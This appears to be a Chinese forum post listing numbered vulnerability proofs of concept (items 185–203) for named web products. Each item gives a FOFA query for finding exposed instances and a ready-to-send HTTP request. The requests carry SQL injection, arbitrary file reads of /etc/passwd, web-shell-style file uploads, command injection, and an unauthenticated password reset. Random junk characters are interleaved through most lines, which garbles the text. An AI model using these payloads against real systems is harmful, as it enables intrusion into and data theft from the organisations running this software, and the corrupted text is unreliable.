Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' W& R& F; ]* b8 S r
X-Requested-With: XMLHttpRequest
+ _2 ?# k# h3 Q3 s
: W8 v: T1 t" Y2 M9 L& X, L. ?/ e8 d' Y) E4 g7 l+ w
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
! q2 I4 H* b ~3 F; l9 e1 f( R' i! w' c4 M, N' f1 x' k& _
& ?( F7 ]/ J0 z/ |8 G185. 瑞友天翼应用虚拟化系统SQL注入% I$ L' n2 ^! T! i
version < 7.0.5.1
/ t9 { G. e5 n a G$ K5 UFOFA:app="REALOR-天翼应用虚拟化系统"
- {! C F1 g; e6 e& ?6 YGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.15 ]" w- g& i9 O2 d, Z& Q
Host: host
0 b9 u2 P0 P" T3 f4 y8 x8 u# F; X+ k3 r: J8 o- p& E; e
7 O4 l/ l8 P0 z+ g, {/ Z1 F; G* r$ S
186. F-logic DataCube3 SQL注入
( Y3 D2 i7 u, |$ Y2 jCVE-2024-31750
$ @3 @" o' d- r- u. A+ j9 yF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统3 t' U: g$ L5 M# ?
FOFA:title=="DataCube3"
7 s4 Z/ I) Z% I# L' zPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1; {4 k8 G! e+ y& K v
Host: your-ip: Q3 m6 |7 U# _ z+ f% O. M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
$ V. u1 f2 ?/ c) yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8( ?( P3 j+ r4 |, {& q( A5 Z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 W; b; ?$ e' T- R
Accept-Encoding: gzip, deflate
- T+ `/ Q$ k y( BConnection: close
9 @1 J* B& X' z# O' QContent-Type: application/x-www-form-urlencoded( ^9 P4 N, ?1 w" j
" O) O1 \; r- H7 g4 J3 c$ Qreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
' `8 u% m2 T+ k: _- d1 |9 d
5 Z0 b/ ^! H& `* v7 o3 ?) g
, g1 d/ w' L8 w& X, \( F% G. I, M$ `187. Mura CMS processAsyncObject SQL注入# l' \5 g# J* I# V4 O' @
CVE-2024-32640
$ ~$ Z" ^4 t( X4 {FOFA:"Mura CMS"
5 Y" b- U5 q" R# b; N2 S8 `8 uPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+ |( k; P# w/ }) _. S6 ]1 ~7 p7 qHost: your-ip
0 C# w0 P$ W) r, O/ ~5 P5 GContent-Type: application/x-www-form-urlencoded
# t, T8 ^+ _& L4 v- M
0 p7 a3 f1 H& s1 Q0 \
( c5 S7 {: W& eobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1" }! W I+ t1 {! ]& w$ I& A8 e5 H: L
( t% b& i$ B- V5 q" C8 q {
, q7 j4 K$ U0 _6 P: B
188. 叁体-佳会视频会议 attachment 任意文件读取
/ I0 E/ x9 ~; B+ Zversion <= 3.9.7, R9 b2 ~7 M8 q% i7 {
FOFA:body="/system/get_rtc_user_defined_info?site_id"$ O$ G. Y p1 L- {& J7 O
GET /attachment?file=/etc/passwd HTTP/1.1( W/ h2 I" H4 Z
Host: your-ip k, J8 ~; }: s! ^# [/ P! c' ]2 T P$ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ X. @. U z) O+ ?, i. PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* v1 N) y. Z. _Accept-Encoding: gzip, deflate# p/ T9 g% b5 t: i8 O6 f: m! j
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8% _+ m# G* ~) r
Connection: close
7 I" @0 Y0 J5 p7 [) _; |& m, u$ N0 x# g: t# Q
; ?; @1 ?6 H5 |2 O- s, Q8 y$ j+ U189. 蓝网科技临床浏览系统 deleteStudy SQL注入
: ]' M7 T# F" C! B# Q' l& jFOFA:app="LANWON-临床浏览系统"6 x/ h; X4 m4 z# [4 z- t& P
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
# s3 E3 Q2 y2 oHost: your-ip
9 @ d) B( t$ {+ N7 V3 }4 K" C& xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
, p9 k# M: P6 _( w6 QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 J& W+ ]/ p0 j
Accept-Encoding: gzip, deflate* a) ` _1 n. y, P
Accept-Language: zh-CN,zh;q=0.9
3 i2 v6 W3 \0 P- jConnection: close
0 ~- o5 d4 I$ k0 z* \
]2 O' c+ Q+ s z; Q |, M$ [5 W# ]6 h3 j5 s7 D- D1 C" ]
190. 短视频矩阵营销系统 poihuoqu 任意文件读取. r9 ]+ ]1 O& X! @2 m, |9 N, d
FOFA:title=="短视频矩阵营销系统"; w5 t( J$ @: o4 Y
POST /index.php/admin/Userinfo/poihuoqu HTTP/2+ } Q5 C5 P, u) f
Host: your-ip% b; f$ ^1 S, ]0 t& V# W% V1 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
) ?$ i8 ]* M0 c! r/ YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 o3 j) ^8 F5 z8 w# C0 r' s) R7 Z8 U
Content-Type: application/x-www-form-urlencoded
/ D6 {. q5 n0 mAccept-Encoding: gzip, deflate
& E# L' u0 z1 s6 aAccept-Language: zh-CN,zh;q=0.99 v, |/ g+ S R3 o2 q) M
" l4 P5 K1 P7 s- }) t! L1 y, o' gpoi=file:///etc/passwd8 A% o0 Q* ]/ A: ]: r5 i5 b+ z6 G
0 W, ^8 E; o5 j% `; F
% O. d3 v, [% R, V d% m
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入$ |1 c/ |/ w: ]6 V7 t, E, Y1 X
FOFA:body="/CDGServer3/index.jsp"5 |+ H5 b) w; {6 V/ e, I
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
4 }$ Y- n3 g( @' ~! {4 UHost: your-ip: Q* m! T; z3 k! l3 O9 W* X1 a- D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* N7 J) A5 Q+ KContent-Type: application/x-www-form-urlencoded
/ X: P8 g: J5 S7 B/ @% G3 p+ w# A1 c- U# Y
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=+ k! Z4 h9 j5 X. j' D" ^
9 K1 o% @+ T2 d; @! F* x) K+ j2 n8 r3 Y# I7 d
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
3 ~: D. g# l' R# s% H$ }FOFA:title="用户登录_富通天下外贸ERP"
* D$ }6 ^! \2 k+ fPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
; p5 r2 M1 D! z4 g8 l5 K+ SHost: your-ip
2 m# I% c5 V; v8 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! M; i& F$ C8 y. N8 o( g$ K! n
Content-Type: application/x-www-form-urlencoded
, r5 D0 x0 k* R4 R' O5 F! ~& e( V0 P6 ?1 }0 Y: w! @+ F7 o
/ v) q2 A; q. X4 d$ z1 L$ i+ O<% @ webhandler language="C#" class="AverageHandler" %>
/ Q. f7 g9 B/ W7 e" ausing System;6 J: H! @. }" G/ j5 F
using System.Web;
2 t1 Y# S: q6 D: ]$ F" ]public class AverageHandler : IHttpHandler, ]) G4 x( l0 @
{ h% m7 v2 n# Z; ~% h- I5 ~
public bool IsReusable2 w* b1 |( ?8 q; [
{ get { return true; } }2 l: L) V/ p, V
public void ProcessRequest(HttpContext ctx)
/ R/ c1 c& p) Y, c3 T0 d! z# W{! Y7 r8 q1 Q' J& i
ctx.Response.Write("test");: m% Y2 ?& F X r% I9 Y* k
}5 J8 H3 e3 \" W
}
) L8 m! X- ]7 s& s( y/ I' c" W3 h/ n1 t0 L3 z# u
o1 V- B9 e* w7 G2 S0 i# T# v193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
( \* x! W7 a9 B- ]. ^FOFA:body="山石云鉴主机安全管理系统"
) }/ C2 r) w) B$ s) W/ ? C+ wGET /master/ajaxActions/getTokenAction.php HTTP/1.1
: r5 U0 Z0 R/ Y/ eHost:
, e8 E4 k! g, U3 p' J, tCookie: PHPSESSID=2333333333333;+ ~) P7 Y3 [' p
Content-Type: application/x-www-form-urlencoded
4 _# h1 k, e: _) F! l, ^" j7 O0 zUser-Agent: Mozilla/5.0
, y# j6 E" F. ~$ I1 Y' @0 {$ o
0 b5 e( @0 z) x9 U/ S. L$ ^3 b$ U- |* C* f8 s" ?+ W$ S! I) q
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.15 M6 f0 M0 n$ M' m. e6 m
Host:
7 n4 k0 t6 ]" H) B* zUser-Agent: Mozilla/5.0, a; |% Q) u6 k2 ~5 x( Q& K" k9 i
Accept-Encoding: gzip, deflate+ |& i" F3 P) `* O2 ~( \
Accept: */*
* n$ A' S, x7 l- c: b4 S6 EConnection: close. a L2 P3 K' p i" g4 y6 V9 s8 v3 Q
Cookie: PHPSESSID=2333333333333;
* _8 Q: v, L7 ?8 l3 |Content-Type: application/x-www-form-urlencoded4 k0 G% V; a [4 W5 y
Content-Length: 84
% l+ S. c2 ]0 Y" k- z+ z$ ]6 a+ b' A: c( C2 p7 C1 c0 `% I
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'). t$ b3 \# m7 F. V" v
( G2 w# E) w, W8 @. a( \
" A& W4 D4 M; f5 @, ~7 B4 j% T
GET /master/img/config HTTP/1.1
' N6 i+ }% ?; l) Q% uHost:8 N5 Z. G* Y) E( D2 G0 X' _: R$ D k
User-Agent: Mozilla/5.0
2 M3 P m4 i" P% d L& U5 u; ]0 U5 t& S9 B& Z% p t: G* S
3 ?) X4 R" [0 u# w9 |6 P+ M
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传6 C$ C4 N0 N; S, x) A
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' r& q J f; K; l1 p/ j
5 i3 `6 f; }4 e8 N- i* SPOST /servlet/uploadAttachmentServlet HTTP/1.1
& I0 M9 h8 O: W) ?; S5 yHost: host# d7 \& J: ?8 d/ Y) T* N6 b" o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
$ K% B0 p" U( h1 S, BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
! q; Z& o" Q W9 ]9 w0 t0 C i# mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. \, a$ A/ h8 O" l0 F7 e2 [7 Z5 x! `
Accept-Encoding: gzip, deflate
9 u% {" w& a0 h" o/ jConnection: close
9 Y0 g' M6 o. p1 D5 W o3 u5 xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
7 w' o; r2 ^: C2 Z; r------WebKitFormBoundaryKNt0t4vBe8cX9rZk
- \( _6 J) }$ `! F/ {$ D* k* \6 s# M( h9 \+ _0 V
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
9 ^( {+ [7 g; D6 b7 t; A; j3 {: DContent-Type: text/plain0 X# B Y3 T, [2 C1 R
<% out.println("hello");%># z8 U8 U- _4 k# i
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
6 l1 ?0 s/ D& wContent-Disposition: form-data; name="json"7 c- \4 J' D. t+ K2 s+ P& w0 z9 k+ B
{"iq":{"query":{"UpdateType":"mail"}}}
1 m, r- n( f( M* r$ g8 E------WebKitFormBoundaryKNt0t4vBe8cX9rZk--7 I3 a) k- m7 O: Z+ `$ X
- l0 Q2 i- r3 s `1 A
! T$ K3 e( Z9 O7 }* O6 J9 o4 y4 H195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
/ A* @* v: e2 ^2 |- B" I- r9 }4 vFOFA:title=="飞鱼星企业级智能上网行为管理系统
9 i1 Q2 ]; O# u9 b+ B, c; l5 b! Z2 ZPOST /send_order.cgi?parameter=operation HTTP/1.1; Z) y( M* w, [% D1 G& z
Host: 127.0.0.1
# @; ^8 w. e+ RPragma: no-cache( R8 W$ k7 O, O0 n) |
Cache-Control: no-cache
+ w5 c6 x( j, O1 j& }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, z( F8 X2 Z8 {( [
Accept: */*
0 d. I, {4 k+ i- a$ oAccept-Encoding: gzip, deflate
5 {1 _& a0 m- V7 MAccept-Language: zh-CN,zh;q=0.9
$ T; c3 \ R4 Y; ZConnection: close
7 T: t! `/ {3 ?6 K: mContent-Type: application/x-www-form-urlencoded. J1 x% e6 i: y/ o" X
Content-Length: 68; p5 `, S" Z* z% S# E
. ~: h) s ?% r0 y5 r{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
* E3 y# O7 ^7 I- ` C
8 W% `- ]2 D6 ?: b" n3 @6 l9 b5 L# [' F8 n/ f w
196. 河南省风速科技统一认证平台密码重置% f! G% a3 H* D- N
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"' z7 {6 y5 A- A
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
^& n! ~* }! M* L$ W% l/ A. \4 dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 p3 \! G. _! B& ^ u3 r* c
Content-Type: application/json;charset=UTF-8: Y9 v! s6 ?1 y6 m
X-Requested-With: XMLHttpRequest
, \ J9 y: }. _" PHost:
5 D; q9 B8 l8 t6 ]; G4 SAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
b: I. h" |: U7 M( KContent-Length: 45
7 M3 c# R& y% k& [! w' HConnection: close
4 v% g8 r' r4 H, F
& z7 D7 C I% ?+ q" s{"xgh":"test","newPass":"test666","email":""}
5 ?" D9 Q! K) P5 C' @6 e7 Q% j. Y. A0 e& {$ L* m; \
1 @* @1 t6 C3 @! b9 |2 F
0 c4 `; _* W% }0 d" f197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入/ {+ T. F4 S5 A( F* R
FOFA:app="浙大恩特客户资源管理系统"
5 [8 Z+ X2 P& [1 e0 L" xGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
' Z, _! S! l8 dHost:$ _: f. r) a. ^& I& a. m3 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.361 W: a+ Y- P# U" |3 K+ a& K' A5 X% }
Accept-Encoding: gzip, deflate0 _/ D; q7 N4 @7 D; k3 l4 p
Connection: close& G" w. q2 l7 Y6 u
+ b! u% r. W/ ?9 a1 t- N0 b
3 Z2 u$ N& s' `1 a. d- b3 a$ z
8 _1 |" \" F. ?
198. 阿里云盘 WebDAV 命令注入
7 ^4 `& m+ x8 h0 n% }( U( qCVE-2024-29640' w3 r8 h5 q" |2 [/ O/ Z
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
# m% }, M* p$ Q5 xCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
7 |) \- l& E s2 IAccept: */*
% v7 M1 a/ K$ B p- ?1 [Accept-Encoding: gzip, deflate4 F* m* W7 V$ T1 @3 j9 I: i
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
4 U6 e. e! f" VConnection: close
( H( @3 I" U+ B( P% A
2 \9 x9 v& U0 q2 }' q1 S3 I6 S+ [( o( ?0 M5 E
199. cockpit系统assetsmanager_upload接口 文件上传8 ]8 {1 x, l3 q* O
& b8 f C9 ]$ p. k1 P
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:! E) @' n6 N6 z. B! {
GET /auth/login?to=/ HTTP/1.1( i' Q7 ?) l( b5 t2 G% ]7 i
1 b- R) F8 C: S" Z4 }响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" K3 O) P$ C4 J0 S. u& T
) ~3 B% r/ I1 V( t2.使用刚才上一步获取到的jwt获取cookie:
4 |% W8 Q. r- m: S* G/ O/ g% _
6 w* p- \& v J, Z5 B. Q& pPOST /auth/check HTTP/1.1' n% s* M! ~1 l, T
Content-Type: application/json. o0 F. W) W: L, I3 z
& _, X# |0 a( w& Q: [! x; V
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}6 h' y8 }; V) t' z4 l+ L
/ W+ a1 U+ y2 ~; P7 Y+ f
响应:200,返回值:
2 j; Q8 n7 `( d Y( o) T% w' C1 t+ {Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
/ o) D' n2 j, s6 ]9 PFofa:title="Authenticate Please!"
" Z0 ?0 y0 [1 l1 fPOST /assetsmanager/upload HTTP/1.1+ n" Q% k7 e% t# _
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3, Y9 Y8 `, B2 C, ?9 z e
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92/ h: E1 Z) F1 M
. p1 ^- r: x* H: p& X-----------------------------36D28FBc36bd6feE7Fb3
" o7 V/ G) ]4 `% @/ pContent-Disposition: form-data; name="files[]"; filename="tttt.php"0 t' m! h, l* F
Content-Type: text/php% V8 c/ n5 e$ e# c) u
( @" P" d4 ?; w' Q7 v% Z& K<?php echo "tttt";unlink(__FILE__);?>
7 m1 }. k& f8 Y# c) L4 D3 ~-----------------------------36D28FBc36bd6feE7Fb3
& g G! @; S" lContent-Disposition: form-data; name="folder"
$ ?9 C( u+ B4 [" y X$ g1 k2 U9 l% z" h
-----------------------------36D28FBc36bd6feE7Fb3--
( M i4 T5 ^, u8 W$ c# T% a6 j$ ^1 f# r! J/ O
- p+ l# T; v4 X' x3 |( E/storage/uploads/tttt.php5 x# Q0 Y4 F ~* }
$ z( @ z% g' Z) s9 {9 h& T
200. SeaCMS海洋影视管理系统dmku SQL注入* H: V6 V" K- v7 d0 x! A9 v( c
FOFA:app="海洋CMS"4 a5 ]# m% Q6 l# \: x6 e
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1# i0 a$ J6 T) z, }) i
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s& t9 j( Y- k; J% W/ C+ e$ k
Upgrade-Insecure-Requests: 1) A: x, j7 _. o8 O: e C6 R' t' l
Cache-Control: max-age=02 N# l2 z, V1 ?2 C, m4 x' P, u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 ^- c4 z0 d& C6 `4 @. EAccept-Encoding: gzip, deflate
) {. n3 Y6 Z; k9 J% k/ a( DAccept-Language: zh-CN,zh;q=0.9
4 B. O) T" O* u |* k5 \
1 l, @: I: o1 J0 @" C4 x1 j
6 s( b) ^" { S2 ^201. 方正全媒体新闻采编系统 binary SQL注入
* r' d0 Z$ u" [. y9 g$ WFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统", }, t4 E: M/ c5 P
POST /newsedit/newsplan/task/binary.do HTTP/1.1 p. l* g3 I" p+ c8 i
Content-Type: application/x-www-form-urlencoded+ x1 p& J4 }( v9 M: [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* z+ U% E6 G3 D# o; ` X+ g" c; ]Accept-Encoding: gzip, deflate( y- s0 R0 T& b" j/ J
Accept-Language: zh-CN,zh;q=0.9( M' o. K/ [( l2 F
Connection: close( t6 ~4 e2 p/ Y. {& ^- P: @
; {4 S, _. C" U
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=17 J- m& \& M$ P
d4 L# Q5 O' o2 w! B8 M
, H" \5 ~5 [* L( w, @" x
202. 微擎系统 AccountEdit任意文件上传
5 w/ [& f5 U" n" @FOFA:body="/Widgets/WidgetCollection/"
, O) g" [- y/ r获取__VIEWSTATE和__EVENTVALIDATION值( E8 w: X8 S/ @8 I0 w- t2 o( u! k
GET /User/AccountEdit.aspx HTTP/1.1
+ U- N% N( d% G/ g! A$ LHost: 滑板人之家7 e! Y3 H" u J! z9 b3 h- x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31- N8 Z1 B4 z* t/ s
Content-Length: 0
. X. I9 r0 G! G
- s M l1 H7 ^0 V% @2 f( v4 P: y0 w$ N9 E" L
替换__VIEWSTATE和__EVENTVALIDATION值( \/ {; c: {% I
POST /User/AccountEdit.aspx HTTP/1.1" ?) J: B( F) \3 p& h1 I
Accept-Encoding: gzip, deflate, br
: s; L* O: `2 Z5 W/ ^* L, ~Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
2 h4 Q2 v/ s$ g3 f1 o# e1 L% d j4 @9 E1 g
-----------------------------786435874t38587593865736587346567358735687
3 o" z5 M" G" FContent-Disposition: form-data; name="__VIEWSTATE") D" T! v) E3 d6 I( \9 a6 @; g1 \
8 @' ~9 M {# ^ C# Z
__VIEWSTATE
, K9 ~8 d1 V( f" Y6 v! a0 a5 n" P/ v-----------------------------786435874t38587593865736587346567358735687
/ q6 l" h% C6 @/ H. q( Q6 MContent-Disposition: form-data; name="__EVENTVALIDATION"0 l" \5 y/ Q# O& [; E: p7 C& h7 S
4 ?2 \5 R9 c% [
__EVENTVALIDATION1 p' |: K) j W* ^
-----------------------------786435874t38587593865736587346567358735687
2 W" |8 ~ W, ] S6 S* U3 wContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"6 R. O4 K- o7 \9 W1 `1 u
Content-Type: text/plain( A( e- h h, m4 {
6 B* M) r' G0 ~, r+ T- h
Hello World!
. d5 X Y$ q9 c" m( a, p9 @* v-----------------------------786435874t38587593865736587346567358735687' b& N" e: Z9 n) \) Q4 f6 \8 _& T0 f
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload". A# t& w. t& E1 X/ c/ g& b
Q* I9 m! a4 K) y& J上传图片
2 G9 D5 X% B7 t, h% }! G-----------------------------786435874t38587593865736587346567358735687
& Q5 A" \7 E: e+ C" [Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"0 j' q6 O' Z. Y8 K( A6 X3 V% Q7 e% d4 ]
2 e7 S, I/ J7 k2 x& ^: g$ f/ J3 p
W7 I/ j: e: d; w* ~- z0 u# F-----------------------------786435874t385875938657365873465673587356870 |$ U4 L& J" q3 l# K: e b }' j1 I
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
5 [. [- O. y5 O$ e4 W- x: ?1 H! l& U" l- c5 X5 ^* F% n7 W
/ I6 Q) d1 B5 M: M" N4 o
-----------------------------786435874t38587593865736587346567358735687--9 p! |1 Z: w1 p
9 G9 p7 R5 ?5 p& ]8 u: x7 D0 g* j
4 Y& m0 I9 `7 n/ g, F0 E9 b) V
/_data/Uploads/1123.txt5 @1 v: |. T- o$ n9 A/ S. q1 A6 X
K7 Z. F& G P3 D- r203. 红海云EHR PtFjk 文件上传$ `+ ?! B6 S. e# `
FOFA:body="RedseaPlatform"
" ^0 G& b- _0 KPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.14 y: {1 s" e1 m& J
Host: x.x.x.x
! R9 W% Y( c, y0 c' @1 pAccept-Encoding: gzip* R5 q% L. \& H, Q6 P9 J! i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 [7 U% F9 ?5 `# Z* r
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
: }+ H4 }! j3 G; V' f& TContent-Length: 210
" M( C6 J- G! U' u4 Q+ X1 [: j3 y: U9 U3 s. W$ s
------WebKitFormBoundaryt7WbDl1tXogoZys4+ v2 D: Q$ q& Y
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
) g" T! \3 ], s. t/ `Content-Type:image/jpeg- H! f- C) J$ Y, n, l: I% ^
& e& {( m: P( S<% out.print("hello,eHR");%>
3 t9 f3 I* R6 G m! U% c2 q------WebKitFormBoundaryt7WbDl1tXogoZys4--
' k+ r; {! }0 |) G% P
4 |$ y7 H8 G) @# U* L9 L7 c, q " b C. I! d, r6 P' {3 P, c
. P- {3 n. P9 b
5 g; W; k7 ~: G4 T4 n. L5 M6 m
& k0 v. S2 Z3 q/ t |
发表于 2024-6-5 14:31:29
收藏
支持
反对